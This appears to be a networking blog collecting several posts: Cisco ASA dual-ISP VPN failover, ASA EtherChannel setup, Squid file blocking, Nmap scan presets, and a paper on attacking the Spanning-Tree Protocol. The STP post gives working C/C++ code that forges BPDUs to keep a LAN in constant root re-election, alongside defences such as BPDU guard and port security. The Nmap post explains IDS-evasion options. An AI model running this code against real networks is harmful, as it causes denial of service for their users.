October 24

Site-to-Site VPN with dual ISP for backup/redundancy

I recently came across a scenario where a customer had two internet links from two different ISPs terminating on his ASA. If the primary link (ISP2) became unavailable, he wanted the site-to-site VPN to fail over to the backup link (ISP3). This post shows how to configure a firewall with two internet links, using the SLA monitoring feature to provide the required redundancy for the site-to-site VPN.

The site with two ISPs (in this case, FW2) is the one that needs the major changes. The basic site-to-site configuration remains the same; only the additional configuration for the backup peer IP 3.3.3.1 is covered in this post.

Backup Site-to-Site VPN - Peering with 2 peer IPs on a single firewall

On FW1:

2.2.2.1 is the primary peer IP for this VPN; its configuration is already in place and the tunnel is up and working.

1. Create tunnel group for the backup peer IP.

tunnel-group 3.3.3.1 type ipsec-l2l
tunnel-group 3.3.3.1 ipsec-attributes
 ikev1 pre-shared-key cisco

2. Add the backup peer IP to the existing crypto map for 2.2.2.1 and make sure the connection-type is set to bi-directional (which is the default).

crypto map outside_map 10 set peer 2.2.2.1 3.3.3.1
crypto map outside_map 10 set connection-type bi-directional
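
To confirm that FW1 now knows about both peers, you can check the crypto map and, after a failover event, the IKEv1 SA. This is only a hedged verification sketch; the exact output depends on your configuration:

show running-config crypto map | include set peer
show crypto ikev1 sa
show vpn-sessiondb l2l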

On FW2:

Interface configuration on FW2 firewall.

interface GigabitEthernet0
 description Connected to ISP2 - Primary link
 nameif outside
 security-level 0
 ip address 2.2.2.1 255.255.255.0 
!
interface GigabitEthernet1
 description Connected to ISP3 - Backup link
 nameif outside2
 security-level 0
 ip address 3.3.3.1 255.255.255.0

1. Create an SLA monitor that checks the gateway IP of ISP2 (primary link) and track it. Attach the track to the primary default route, and add a second default route pointing towards the gateway IP of ISP3 (backup link) with an administrative distance of 254, so that it only becomes active when the tracked primary route is withdrawn.

sla monitor 10
 type echo protocol ipIcmpEcho 2.2.2.2 interface outside
 frequency 5
sla monitor schedule 10 life forever start-time now
!
track 1 rtr 10 reachability
!
route outside 0.0.0.0 0.0.0.0 2.2.2.2 1 track 1
route outside2 0.0.0.0 0.0.0.0 3.3.3.2 254
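
A quick, illustrative way to confirm that the SLA probe and the tracked route behave as expected (output omitted; names and numbers as configured above):

show sla monitor operational-state
show track 1
show route | include 0.0.0.0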

2. IKEv1 and ‘crypto map outside_map’ are already enabled and applied on the outside interface. When the ISP2 link goes down, the outside2 interface will terminate the VPN, so the following needs to be done for the VPN to establish. Also check that the connection-type is set to bi-directional (the default).

Enable ‘crypto ikev1’ and apply the ‘outside_map’ on the outside2 interface:

Existing config:

crypto ikev1 enable outside
crypto map outside_map interface outside
crypto map outside_map 10 set connection-type bi-directional

Additional config:

crypto ikev1 enable outside2
crypto map outside_map interface outside2

3. Create additional NAT statements for the outside2 interface, mirroring your existing NAT.

Existing NAT:

nat (inside,outside) source static 10.2.2.0-24 10.2.2.0-24 destination static 10.1.1.0-24 10.1.1.0-24 no-proxy-arp route-lookup
nat (inside,outside) after-auto source dynamic any interface

Additional NAT:

nat (inside,outside2) source static 10.2.2.0-24 10.2.2.0-24 destination static 10.1.1.0-24 10.1.1.0-24 no-proxy-arp route-lookup
nat (inside,outside2) after-auto source dynamic any interface
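
Once traffic fails over to outside2, packet-tracer is a handy way to verify that flows towards the remote network hit the new NAT rule and leave via the backup route. The host addresses below are just sample hosts from the 10.2.2.0/24 and 10.1.1.0/24 networks used above:

packet-tracer input inside tcp 10.2.2.10 12345 10.1.1.10 80 detailed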
Category: CISCO, VPN
May 27

Attacking the Spanning-Tree Protocol

Updated Proof of Concept available! Works with 2.6.x kernels.

Progress waits for nobody. Companies around the world are becoming more and more dependent on information technology. Non-stop access to email, file servers, databases and online services is no longer a competitive advantage – it is a vital necessity that employee productivity depends on. Constant network availability is one of the most important aspects to consider when planning a network topology. User demands are increasing every year, as are the quality standards that modern networks must comply with.

Today’s networks must not only have low jitter and latency, but must also be redundant and achieve five-nines (99.999%) availability. This means only a bit over 5 minutes of downtime per year. To achieve these high standards, networks are designed with redundancy in mind, that is, with multiple physical paths to every network segment.

Multiple physical paths create a highly undesirable condition within a network: switching loops. Network loops lead to broadcast storms, multiple frame copies, and MAC address-table instability. This is where the Spanning-Tree Protocol (STP) comes in. The role of the STP is to create a loop-free logical topology in redundant networks.

The purpose of this paper is to briefly describe the STP and its function in redundant network topologies. I describe the attack vector that can be used to disrupt the stability of the STP’s operations, and provide a working implementation as proof of concept.

Background Information: Redundant Network Topologies

Take a look at the network below. It illustrates a simple redundant topology. If someone pulls out the power plug of one of the Layer 2 Switches (green) (for example, the janitor, because he needed a place to plug in his vacuum cleaner), or there is a network cable failure between a L2 and the L3 Switch (red), the network will still operate, because there is more than one path to any network segment.

If a physical link between the Layer 3 Switch (red) and a Layer 2 Switch (green) fails, this redundant network topology will remain operational.

Redundant topologies naturally have physical loops within them. Because Layer 2 frames have no Time-To-Live mechanism, loops within a network lead to switching problems like broadcast storms and MAC address-table instability. This results in high latency, unreliable network operation, and in turn user complaints.

Spanning-Tree Protocol Operations

Defined in IEEE 802.1D, the STP was designed to ensure a loop-free network environment. It allows switches to create a loop-free logical topology even if the network has physical loops within it. The STP operates by moving switch ports into blocking or forwarding states depending on the segments they connect to. There are three basic steps in which STP establishes its topology: electing the root bridge, selecting one root port on every non-root bridge, and selecting one designated port per network segment.

Electing the root bridge is done by exchanging Layer 2 Bridge Protocol Data Units (BPDUs).

When the STP is in use, every port on a switch goes through several states: blocking, listening, learning and, finally, forwarding (or it remains in blocking).

After about 50 seconds every port on a switch is placed either in the forwarding or the blocking state, thus creating a logical, loop-free topology. During the election process each switch sends, receives and processes BPDUs to determine the root bridge. A BPDU looks like this (in C):

// u8, u16 and u32 are assumed to be unsigned 8-, 16- and 32-bit integer typedefs
struct ether_header
{
	u8  	dhost[6]; // destination MAC 
	// (STP multicast: 01-80-C2-00-00-00)
	
	u8  	shost[6]; // = 0x0000 for our purposes
	u16 	size;     // = 52  for our purposes
} __attribute__ ((packed));

struct llc_header {
	u8 dsap; 	// = 0x42 for our purposes
	u8 ssap; 	// = 0x42 for our purposes
	u8 func; 	// = 0x03 for our purposes
} __attribute__ ((packed));

struct stp_header {
	struct 	llc_header llc;
	u16 	type; 	// = 0x0000 for our purposes
	u8	version; 	// = 0x00  for our purposes
	u8	config; 	// = 0x00  for our purposes
	u8	flags; 		// = 0x00  for our purposes
	
	union {
		u8    root_id[8];	
		struct {
			u16	root_priority; 
			u8    	root_hdwaddr[6]; 	
		} root_data;
	};
	u32	root_path_cost; 	// = 0x00  for our purposes
	
	union {
		u8    bridge_id[8];	
		struct {
			u16	bridge_priority; 		
			u8    bridge_hdwaddr[6];
		} bridge_data;
	};
	
	u16 	port_id; 		// = 0x8002  for our purposes
	u16 	message_age; 	// = 0x0000  for our purposes
	u16 	max_age; 		// = 0x0001  for our purposes
	u16 	hello_time; 	// = 0x0001  for our purposes
	u16 	forward_delay; 	// = 0x0001  for our purposes
} __attribute__ ((packed));

typedef struct {
	struct ether_header eth;
	struct stp_header stp;
} eth_stp;

The root_priority and root_hdwaddr[6] fields together form an 8-octet bridge ID. The bridge with the lowest ID becomes the root bridge. When sending BPDUs the switch sets the root ID to its own ID. Because every switch stops sending BPDUs when it receives a BPDU with a lower root ID than its own, eventually the only switch sending BPDUs is the root bridge.

After the root bridge election, every switch sets its ports to either the forwarding or the blocking state. The network might look something like this:

If a network topology change occurs (a link goes down, or a switch fails or is added to the network), the election process must be repeated. To indicate that it is still operating, the root switch continuously sends BPDUs. These intervals are controlled by the hello_time field in the BPDUs (2 seconds by default). If the switches within the broadcast domain do not receive the root bridge’s BPDUs within the time defined in the max_age field, the root bridge is considered down and a new election is started.

Attack Vector

Our attack vector is to disrupt the switches’ spanning trees, destabilize their MAC address-tables and hold the network in a constant state of re-electing the root bridge. We can achieve this because there is no authentication mechanism built into the STP.

By crafting BPDUs of a non-existent switch with an ID of 1, we can elect our non-existent switch as the root bridge. By using a minimal max-age in our crafted packets and then not sending BPDUs within that time, we cause another election on the network, during which we start sending our BPDUs again, once more winning the election and becoming the root bridge.

By repeating this process the network is kept in a constant state of re-electing the root bridge, and any broadcast or multicast traffic will cause a broadcast storm, saturating the network with frames.

Let’s see how we can make this happen under Linux. First we must create a low level socket to craft our packets. The Spanning-Tree Protocol operates at the data-link layer. We will need to create our packets from the very lowest layer, including the headers for our Ethernet frames. But first the socket:

int fd;
if ((fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) == -1) {
	perror("socket:");
		return 0;
}

Sending frames in Linux at Layer 2 requires using the sockaddr_ll structure when calling the sendto() function. This structure is defined in include/linux/if_packet.h as:

struct sockaddr_ll
{
        unsigned short  sll_family;
        unsigned short  sll_protocol;
        int             sll_ifindex;
        unsigned short  sll_hatype;
        unsigned char   sll_pkttype;
        unsigned char   sll_halen;
        unsigned char   sll_addr[8];
};

We set the sll_family field to AF_PACKET and sll_protocol to 0. In order to retrieve the interface index we want to set in sll_ifindex, we must use the ifreq structure and the ioctl() function. sll_hatype, sll_pkttype and sll_halen should equal 1, 0 and 6 respectively. Finally, we set the interface's hardware address in sll_addr. First we need the identifier of the interface we want to use in text form, like eth0 or fxp0. See the following example:

char *interface_name = "eth0";
sockaddr_ll sock;
ifreq ifr;

int tmpfd = socket (AF_INET, SOCK_DGRAM, 0);
memset (&ifr, 0, sizeof(ifr));                          // ensure ifr_name is zero-terminated
strncpy (ifr.ifr_name, interface_name, IFNAMSIZ - 1);

ioctl (tmpfd, SIOCGIFINDEX, &ifr);    // get interface index
sock.sll_ifindex = ifr.ifr_ifindex;   // set it in sock struct     

ioctl (tmpfd, SIOCGIFHWADDR, &ifr);   // get interface addr	
memcpy (sock.sll_addr, ifr.ifr_hwaddr.sa_data, 6); 

close (tmpfd);

Next we can proceed to craft our BPDUs. We start off by defining a root bridge identifier. In order to elect our “ghost” bridge as root, it must have the lowest identifier in the network. Priority and hardware address are the two components of the bridge ID: the first two bytes are the priority, the next six are the MAC address. By definition the priority varies between 1 and 32768, therefore setting the ID to [0x00][0x01][any 6 bytes] should yield the expected results. We have two approaches here: a) use the same bridge ID in every packet, or b) randomize it for every frame.

char shwaddr[8];
shwaddr[0] = 0x00;
shwaddr[1] = 0x01;

a)
memcpy(shwaddr + 2, ifr.ifr_hwaddr.sa_data, 6);

b)
void make_rand_hwaddr(char *buf)
{
	for (int i(0); i < 6; ++i)
		buf[i] = rand() % 256;
}

make_rand_hwaddr(shwaddr + 2);

Next we create and fill a eth_stp structure. In my implementation I use the following functions:

u16 atohex (u8 *hex)
{
	short int x,y,a,a2=0;
	char buf[2];

	char nums[] = {"0123456789abcdef"};

	memcpy(buf, hex, 2);	
	for (int x(0); x < 2; ++x) {
		for (int y(0); y < 16; ++y) {
			if (buf[x] == nums[y]) {
				if (x == 0) 
					a = (y) * 16;   
				else 
					a = y;
				a2 +=a;
	   		}
	    }
	}
	return a2;
}

u8 *ascii_to_hwaddr (const char *hwaddr)
{
	u8 t[2];
	u8 y(0);
	static u8 buf[6];
	do {     
	    t[0] = *hwaddr++;	
	    t[1] = *hwaddr++;
	    hwaddr++;
	    buf[y] = atohex (t);
	    y++;
	} while (y < 6);
	
	return (buf);
}

const char *fill_stp_header(char *shwaddr, bool topology_change,
	char *root_id, u32 forward_delay, u32 max_age, u32 hello_time, 
	u32 port_id)
{
	static eth_stp stp_packet;
	memset(&stp_packet, 0, sizeof(stp_packet));

	memcpy(stp_packet.eth.dhost, 
		ascii_to_hwaddr("01-80-c2-00-00-00"), 6);
	memcpy (stp_packet.eth.shost, shwaddr, 6);  
	memcpy(stp_packet.stp.root_id, root_id, 8);
	memcpy(stp_packet.stp.bridge_id, root_id, 8);

    	stp_packet.eth.size = htons(0x0034);
	stp_packet.stp.llc.dsap = 0x42;
	stp_packet.stp.llc.ssap = 0x42;
	stp_packet.stp.llc.func = 0x03;
	stp_packet.stp.port_id = port_id;
	stp_packet.stp.hello_time = hello_time;
	stp_packet.stp.max_age = max_age;
	stp_packet.stp.forward_delay = forward_delay;

	if (topology_change)
		stp_packet.stp.flags = 0x01;
	
	return (const char*) &stp_packet;
}

In the function fill_stp_header() the parameters have the following meaning:

  • *shwaddr – the source MAC address for our packet (we can use a valid one or spoof a non-existent address). This must be a pointer to a 6-byte buffer.
  • topology_change – a true/false parameter. If true, the topology change flag will be set in our STP frame, making other bridges “re-announce” the change of the root bridge.
  • *root_id – a pointer to an 8-byte buffer containing the root bridge ID (2-byte priority + 6-byte MAC).
  • forward_delay – the delay in seconds that switch ports should spend in the listening and learning states before moving to the learning and forwarding states respectively. Refer to the “Spanning-Tree Protocol Operations” section for details.
  • max_age – the number of seconds a switch should wait without receiving STP frames before considering the root bridge down and restarting the election process.
  • hello_time – the number of seconds within which switches expect to receive BPDUs.
  • port_id – the ID of the port on the sending bridge.

After we have prepared our header and gathered all the necessary information, we can send our frames using the very basic sendto() function.

const char *buf = fill_stp_header(shwaddr + 2, topology_change, 
	shwaddr, forward_delay, max_age, hello_time, port_id);

int fd;
if ((fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) == -1) {
	perror("socket:");
	return 0;
}
			
if ((sendto (fd, buf, sizeof(eth_stp), 0, (struct sockaddr*)&sock, 
	sizeof(sockaddr_ll))) == -1) {
	perror("sendto:");
	return 0;
}
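
To tie the pieces together, the re-election loop described in the “Attack Vector” section could look roughly like the sketch below. It assumes the fd, sock and shwaddr variables prepared earlier; the timing values and port ID are illustrative, not taken from the original tool.

for (;;) {
	// craft a BPDU claiming that our "ghost" bridge (shwaddr) is the root
	const char *frame = fill_stp_header(shwaddr + 2, true, shwaddr,
		1 /* forward_delay */, 1 /* max_age */,
		1 /* hello_time */, 0x8002 /* port_id */);

	if (sendto(fd, frame, sizeof(eth_stp), 0,
		(struct sockaddr*)&sock, sizeof(sockaddr_ll)) == -1) {
		perror("sendto:");
		break;
	}

	// stay silent longer than the advertised max_age, so the switches declare
	// our root bridge dead and start a new election, which the next frame
	// wins again; sleep() comes from <unistd.h>
	sleep(2);
}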

This concludes the code writing section of this document. The described vulnerability permits all sorts of attacks, not just the simple denial of service that I described. For more details refer to [1].

Protecting Your Networks

There are a couple of simple methods to prevent the exploitation of this STP weakness in your network. For any STP attack to be feasible, the switch must accept BPDUs on a port that the attacker has access to. It is therefore possible to make such an attack impossible by denying ordinary users access to STP-enabled ports. This can be done by disabling STP on access ports, enabling port security on all user ports, and restricting physical access to network equipment.

With STP disabled on user ports, the attacker would have to access the switch physically and connect his computer to a switch-to-switch port (assuming all unused ports are either disabled or have STP disabled). If you cannot restrict physical access to your network devices, other measures must be taken to ensure network security. Port security is a feature that allows the switch to accept frames from only a given number (usually the first learned) of source MAC addresses. Enabling port security on user ports makes the attack unfeasible without prior network sniffing or hijacking a user’s workstation.
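
On Cisco IOS switches, for instance, the measures above roughly translate into PortFast plus BPDU Guard (which error-disables an access port the moment it receives a BPDU) and port security on user-facing ports. This is only a hedged sketch; the interface range and MAC limit are placeholders to adapt to your environment:

interface range GigabitEthernet1/0/1 - 24
 description user access ports
 switchport mode access
 spanning-tree portfast
 spanning-tree bpduguard enable
 switchport port-security
 switchport port-security maximum 1
 switchport port-security violation shutdown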

Conclusion

While most network administrators concentrate on security issues in the upper layers of the OSI model (3-7), such as route poisoning, access filtering and exploitable service bugs, many still neglect the basic security risks of the physical and data link layers. Restricting physical access to network devices is an important part of one’s security policy, but securing the data link layer shouldn’t be overlooked either. In the past the second layer of the OSI model only had to handle forwarding and physical addressing. As the demands we put on networks have grown, so has the complexity of the protocols working at this level.

The Spanning-Tree Protocol’s flaws are minor, but can lead to a denial of service that can be carried out by even a relatively unskilled attacker. The measures that can be taken to prevent the attack should become a standard for basic security in LAN environments.

Proof of Concept – C++ Code

Proof of concept code of Spanning-Tree Protocol vulnerabilities written in C++.

md5sum: 8e516dba2a8b1451d753f0761567a5a0  stp-spoof-0.2.tar.bz2
Category: NETWORKING, STP
April 4

Etherchannel (Port Channel) on Cisco ASA

A Cisco ASA generally has one management interface and four Gigabit interfaces, but in modern, scalable infrastructures you will need more than four interfaces. To work around this limitation you can configure VLANs and trunk them over an interface. This used to be the standard solution; however, since ASA version 8.4.2 you can also use an EtherChannel to solve the problem.

The benefit of an EtherChannel (port channel) is that you get redundancy and load balancing at the same time: all four ASA interfaces are bundled into one Layer 2 link, you assign all VLANs directly to the port channel, and they then apply to all member interfaces of the ASA.

The ASA distributes traffic across all member interfaces, which gives you working load balancing; furthermore, if you lose one or two interfaces, all traffic is redistributed across the interfaces that remain available.
If you run a port channel on the ASA you are permitted to create up to 200 VLANs.


The port channel configuration is not really tricky, but it is a little complex, and it is best to keep a history of your changes so you don't lose track of what you configured and why.
Here you can see a port channel configuration on an ASA 5540 and a Catalyst 2960.
First of all, you have to configure the port channel on the Catalyst; it is very simple, something like this:

!
interface Port-channel1
switchport mode trunk
!

Then apply the port channel configuration to the four Catalyst interfaces that are connected to the ASA (in this case GigabitEthernet1/12 through GigabitEthernet1/15):

!
interface GigabitEthernet1/12
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet1/13
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet1/14
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet1/15
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!

 

OK, we are finished with the Catalyst configuration; now let's go over to the ASA and create the port channel:

 

!
interface Port-channel1
no nameif
no security-level
no ip address
!

 

Now we apply Port-channel 1 to the four interfaces:
!
interface GigabitEthernet0
channel-group 1 mode on
no nameif
no security-level
no ip address
!
interface GigabitEthernet1
channel-group 1 mode on
no nameif
no security-level
no ip address
!
interface GigabitEthernet2
channel-group 1 mode on
no nameif
no security-level
no ip address
!
interface GigabitEthernet3
channel-group 1 mode on
no nameif
no security-level
no ip address
!
The next steps are very important: for each VLAN you have to create a port-channel sub-interface, in which you define the VLAN ID, IP address and security level. Here is one inside and one OUTSIDE sub-interface:
!
interface Port-channel1.10
vlan 10
nameif inside
security-level 100
ip address 192.168.XX.XXX 255.255.255.0
!
and
!
interface Port-channel1.1000
vlan 1000
nameif OUTSIDE
security-level 0
ip address dhcp setroute
!
Well, that is all!

It is important to have the same VLAN numbers and VLAN IDs on both sides, so when you add a new VLAN you should apply that configuration on the Catalyst first. For debugging and monitoring the port channel you can use:

show port-channel summary

Number of channel-groups in use: 1
Group  Port-channel  Protocol  Ports
------+-------------+---------+-------------------------------------
1      Po1(U)        LACP      Gi0/0(P) Gi0/1(P) Gi0/2(P) Gi0/3(P)

The command displays the number of port channel groups and which interfaces are members; furthermore, you can see the channel-group protocol, LACP (Link Aggregation Control Protocol). Keep in mind that the Cisco ASA supports LACP only (no PAgP). You get more useful information by using:

show port-channel detail

 

Group: 1
----------
Ports: 4  Maxports = 16              <- we are using four interfaces; this can be extended up to 16 physical interfaces
Port-channels: 1  Max Port-channels= 48   <- up to 48 different port channel groups can be configured
Protocol: LACP/ active
Minimum Links: 2                     <- the minimum number of physical interfaces for a port channel group
Maximum Bundle: 8                    <- a maximum of 8 physical interfaces can be bundled into one port channel
Load balance: src-dst-ip
Ports in the group:
-------------------

For the Catalyst I prefer to use:

sho etherchannel port-channel
Channel-group listing:
----------------------
Group: 1
----------
Port-channels in the group:
---------------------------
Port-channel: Po1 (Primary Aggregator)
------------
Age of the Port-channel = 761d:02h:50m:21s
Logical slot/port = 5/1 Number of ports = 4
HotStandBy port = null
Port state = Port-channel Ag-Inuse
Protocol = LACP
Port security = Disabled
Ports in the Port-channel:
Index   Load   Port       EC state        No of bits
------+------+----------+----------------+-----------
  0     00     Gi1/0/45   Active          0
  0     00     Gi1/0/46   Active          0
  0     00     Gi1/0/47   Active          0
  0     00     Gi1/0/48   Active          0
Time since last port bundled: 749d:02h:28m:31s Gi1/0/46

Just like the commands on the ASA, the Catalyst shows you the port channel number, the port channel status, and the physical interfaces that belong to this port channel group.

Don't worry about the Spanning-Tree Protocol (STP) on the Catalyst: STP counts the four EtherChannel interfaces as "one" link, like a single port, so no member of the EtherChannel will be blocked by STP to prevent looping. I personally use portfast for the port channel, but you have to modify the command for a trunk interface:

spanning-tree portfast trunk

 

Category: ASA, CISCO
March 25

Squid content filtering: block download of MP3, MPG, MPEG and EXE files

Q. For security and to save bandwidth I would like to configure the Squid proxy server in such a way that my users cannot download any of the following file types:
MP3
MPEG
MPG
AVG
AVI
EXE

How do I configure squid content filtering?

A. You can use squid ACL (access control list) to block all these files easily.

How do I block music files using squid content filtering ACL?

First open squid.conf file /etc/squid/squid.conf:

# vi /etc/squid/squid.conf
Now add the following lines to your squid ACL section:

acl blockfiles urlpath_regex "/etc/squid/blocks.files.acl"

To display a custom error message when a file is blocked, also add:
# Deny all blocked extensions
deny_info ERR_BLOCKED_FILES blockfiles
http_access deny blockfiles

Save and close the file.

Create a custom error message HTML file called ERR_BLOCKED_FILES in the /etc/squid/error/ directory or in the /usr/share/squid/errors/English directory.
# vi ERR_BLOCKED_FILES
Append the following content:

<HTML>
<HEAD>
<TITLE>ERROR: Blocked file content</TITLE>
</HEAD>
<BODY>
<H1>File is blocked due to new IT policy</H1>
<p>Please contact helpdesk for more information:</p>
Phone: 555-12435 (ext 44)<br>
Email: helpdesk@yourcorp.com<br>

Caution: Do not include the closing </BODY> and </HTML> tags, as they will be added by Squid.
Now create /etc/squid/blocks.files.acl file:
# vi /etc/squid/blocks.files.acl
Append the following text:
\.[Ee][Xx][Ee]$
\.[Aa][Vv][Ii]$
\.[Mm][Pp][Gg]$
\.[Mm][Pp][Ee][Gg]$
\.[Mm][Pp]3$

Save and close the file. Restart Squid:
# /etc/init.d/squid restart
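
To test the filter you can request a blocked extension through the proxy. The command below is only an illustration and assumes Squid is listening on its default port 3128 on localhost; adjust the proxy address and URL to your setup. A blocked file type should return the custom error page instead of the download:

# curl -x http://127.0.0.1:3128 -I http://example.com/sample.mp3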

Squid in action (screenshot: Squid content filtering howto)

Category: NETWORKING, PROXY
September 28

Nmap preset scans – Options and scan types explained

The presets

Before we go into the different options in use, here is a brief explanation of each of the presets that come with Zenmap.

Intense scan

Command: nmap -T4 -A -v <target>

Should be reasonably quick; it scans the most common TCP ports and makes an effort to determine the OS type and which services, and which versions of them, are running.

This comes from having a pretty fast timing template (-T4) and from using the -A option, which tries to determine services, versions and the OS. With verbose output (-v) it also gives us a lot of feedback as Nmap makes progress with the scan.

Intense scan plus UDP

Command: nmap -sS -sU -T4 -A -v <target>

Same as the regular Intense scan, just that we will also scan UDP ports (-sU).

The -sS option tells Nmap to scan TCP ports using SYN packets. Because this scan also includes UDP ports, the explicit -sS is necessary.

Intense scan, all TCP ports

Command: nmap -p 1-65535 -T4 -A -v <target>

Leave no TCP ports unchecked.

Normally Nmap scans a list of the 1000 most common ports, but in this example we will instead scan everything from port 1 to 65535 (the maximum). The list of most common ports can be found in the file called nmap-services.

Intense scan, no ping

Command: nmap -T4 -A -v -Pn <target>

Just like the other intense scans, except this one assumes the host is up. Useful if the target is blocking ping requests and you already know the target is up.

Ping scan

Command: nmap -sn <target>

Only ping the target; no port scan.

Quick scan

Command: nmap -T4 -F <target>

Scan faster than the intense scan by limiting the number of TCP ports scanned to only the top 100 most common TCP ports.

Quick scan plus

Command: nmap -sV -T4 -O -F --version-light <target>

Add a little bit of version and OS detection and you get the Quick scan plus.

Quick traceroute

Command: nmap -sn --traceroute <target>

Use this option when you need to determine hosts and routers in a network scan. It will traceroute and ping all hosts defined in the target.

Regular scan

Command: nmap <target>

Default everything. This means it will issue a TCP SYN scan for the most common 1000 TCP ports, using ICMP Echo request (ping) for host detection.

Slow comprehensive scan

Command: nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" <target>

This scan has a whole bunch of options in it and may seem daunting to understand at first. It is, however, not so complicated once you take a closer look at the options. The scan can be described as an "Intense scan plus UDP" plus some extra features.

It will put a whole lot of effort into host detection, not giving up if the initial ping request fails. It uses several different protocols to detect hosts: ICMP, TCP, UDP and SCTP.

If a host is detected, it will do its best to determine what OS, services and versions the host is running, based on the most common TCP and UDP services. The scan also camouflages itself by using source port 53 (DNS).

The options

-T4    This is the timing template option. Numbers range from 0 to 5, where 5 is the fastest and 0 is the slowest.

So what is a timing template? Basically it is Nmap’s developers giving the user an easy way of tuning how fast Nmap performs. The Nmap manual translates the different numbers to this:
0: paranoid 1: sneaky 2: polite 3: normal 4: aggressive 5: insane

Again, this translates into 1-2 being used for IDS evasion, 3 being the default, and 4-5 being really quick scans. As an example, when I ran a regular scan on one host with -T2 it took 400 seconds, while with -T5 it took 0.07 seconds. Read more about this in the Timing and Performance section of the manual.
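
If you want to reproduce that kind of comparison yourself, timing the same single-host scan with two different templates is enough. The target address below is just a placeholder:

$ time nmap -T2 192.168.0.10
$ time nmap -T5 192.168.0.10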

-A    This option makes Nmap make an effort to identify the target OS, services and their versions. It also does a traceroute and applies NSE scripts to detect additional information. This is quite a noisy scan, as it applies many different probes. The NSE scripts applied are the default set of scripts.

The -A option is equivalent to applying the following options to your scan: -sC -sV -O --traceroute

-v    Increased verbosity. This will give you extra information in the data output by Nmap.

-sS    Perform a TCP SYN scan. This just means that Nmap sends a TCP SYN packet, just like any normal application would. If the port is open the service must reply with SYN/ACK; however, rather than completing the handshake and leaving half-open connections behind, Nmap sends a RST to tear the connection down again. If you were to look at such a scan in Wireshark you would see something like this:

Looking at a TCP SYN scan in Wireshark against port 80. In this case the port was open.

-sU    Perform a UDP scan. Because UDP is unreliable, it is not as easy to determine whether ports are open as it is with TCP. The UDP scan sends a UDP packet with an empty payload to the target port. If the port is closed the OS should reply with an ICMP port unreachable error; however, if the port is open the service will not necessarily reply with anything.

If service scanning (-sV) is enabled, Nmap will send additional packets with different payloads in order to try to trigger a response from the service. This type of scanning can be really slow, because a typical OS will only send about one ICMP port unreachable message per second. The following Wireshark screenshots illustrate a case where UDP port 69 is closed and UDP port 68 is either open or filtered.

Port 69 closed and 68 is open

-sN   TCP Null scan. This option sends TCP packets with none of the TCP flags set. If a RST packet is returned, the port is closed; if nothing is returned, it is either filtered or open. The following picture is a Wireshark illustration showing that none of the TCP flags have been set:

None of the TCP flags in the packet have been set

-sV    Actively probe open ports to try to determine what service and version they are running. Running this scan against my webserver resulted in 14 packets being transmitted between client and server, in contrast to just 2 packets with a regular SYN scan. The picture below shows version-scanning packets being sent to the server and the response coming back. The HTTP header reveals the webserver, its version and the OS type in play.

Nmap version scanning HTTP service

-p    Comma-separated list of ports to scan. An easy way to define only a few ports to scan, or to increase the scope of the scan to, e.g., every available TCP port.

-F    Fast mode. Instead of scanning as many ports as the default scan does, the fast scan only scans a few. As a comparison, when I scanned with fast mode 202 packets were exchanged, while with the default scan (no parameters) 2002 packets were exchanged. Both scans discovered ports 80 and 22 open on the target host.

-O    Make Nmap try to determine the OS type. The process of OS detection can be quite complex, but also quite simple. It is based on many different factors which I cannot go through here. A simple way to guess whether it is a Windows or a Unix OS is to look at the TTL (Time To Live) field of packets sent by the OS: Windows usually defaults to 128 while Unix defaults to 64.
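
As a simple illustration of that TTL hint, even a plain ping gives it away. The addresses and timings below are made up, and the observed TTL also depends on the number of router hops in between:

$ ping -c 1 192.168.0.10
64 bytes from 192.168.0.10: icmp_seq=1 ttl=64 time=0.42 ms

$ ping -c 1 192.168.0.20
64 bytes from 192.168.0.20: icmp_seq=1 ttl=128 time=0.51 ms

A TTL near 64 suggests a Unix-like host, while a TTL near 128 suggests Windows.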

–traceroute   Perform a traceroute to the target.

--version-light    This is an option for the service detection scans (-sV and -A); it limits the number of probes sent to each service. The limitation means Nmap will only probe services with the probes most likely to bring back a successful result. If you are curious about what probes Nmap sends, I recommend using the --version-trace option to get detailed information about the scan. An excerpt of different types of SSH probes can be seen here:

-PE    This parameter controls how Nmap discovers hosts; this one tells Nmap to use ICMP echo requests to decide whether a host is up. It is the same as pinging the target host to determine whether it is up.

-PP    This tells Nmap to send an ICMP timestamp request, instead of a regular ICMP echo request, to determine whether a host is up. This special type of ICMP request was originally used for synchronizing timestamps between communicating nodes, but has been replaced by the more common Network Time Protocol. This type of probe was not successful in determining whether my host was up.

ICMP host discovery in action. In this example I’ve first run -PE, then -PP and finally -PM (which is not explained in this article)

-PS    Also used for host discovery. This option simply relies on a port (80 by default) replying to an empty SYN packet, as per normal TCP behaviour. Simple is often good.

In the preset scans you will notice that argument 80,443 is given to this option. These are common ports used for webservers and are often open on targets.

-PA    Much like the -PS option, this one sends a TCP packet with the ACK flag set instead. This should cause the responding server to respond with a RST packet if it is listening on that port as it is not expecting any data to be acknowledged by an ACK packet. Sometimes firewall administrators configure the firewall to drop incoming SYN packets to prevent any traffic, which would allow for ACK packets to pass through.

In the preset scans you will notice that argument 3389 is given to this option. This is the port for remote desktop which is a service often enabled on servers. When other host detection methods fail, this may increase the success chance.

-PU    This sends a UDP packet to the target port (40125 by default) in order to try to elicit an "ICMP port unreachable" message from the server. Sometimes firewalls only drop TCP packets and don't care about UDP packets, allowing this type of packet through. Some configurations also allow any type of packet through where only TCP should be allowed. Camouflaging your host discovery as a UDP packet on port 53 (DNS) could be a very stealthy approach.

-PY    Very much like a TCP SYN scan, this just utilizes the SCTP (Stream Control Transmission Protocol) instead.

-g    Specify the source port you want to use. Note that this is different from the destination port you are scanning. The real use for this comes when trying to evade an IDS or to blend in with other regular traffic.

--script    Via the NSE (Nmap Scripting Engine) it is possible for anyone to write custom scripts for Nmap to use. This parameter takes a comma-separated list of files, categories and directories containing NSE scripts. Because NSE supports expressions, you can tell Nmap to load scripts in many different ways.

The "default or (discovery and safe)" argument tells Nmap to load all scripts from the default category, plus the scripts in the discovery category that are also in the safe category.

-Pn    Assume the host is up thus skipping the host discovery phase.

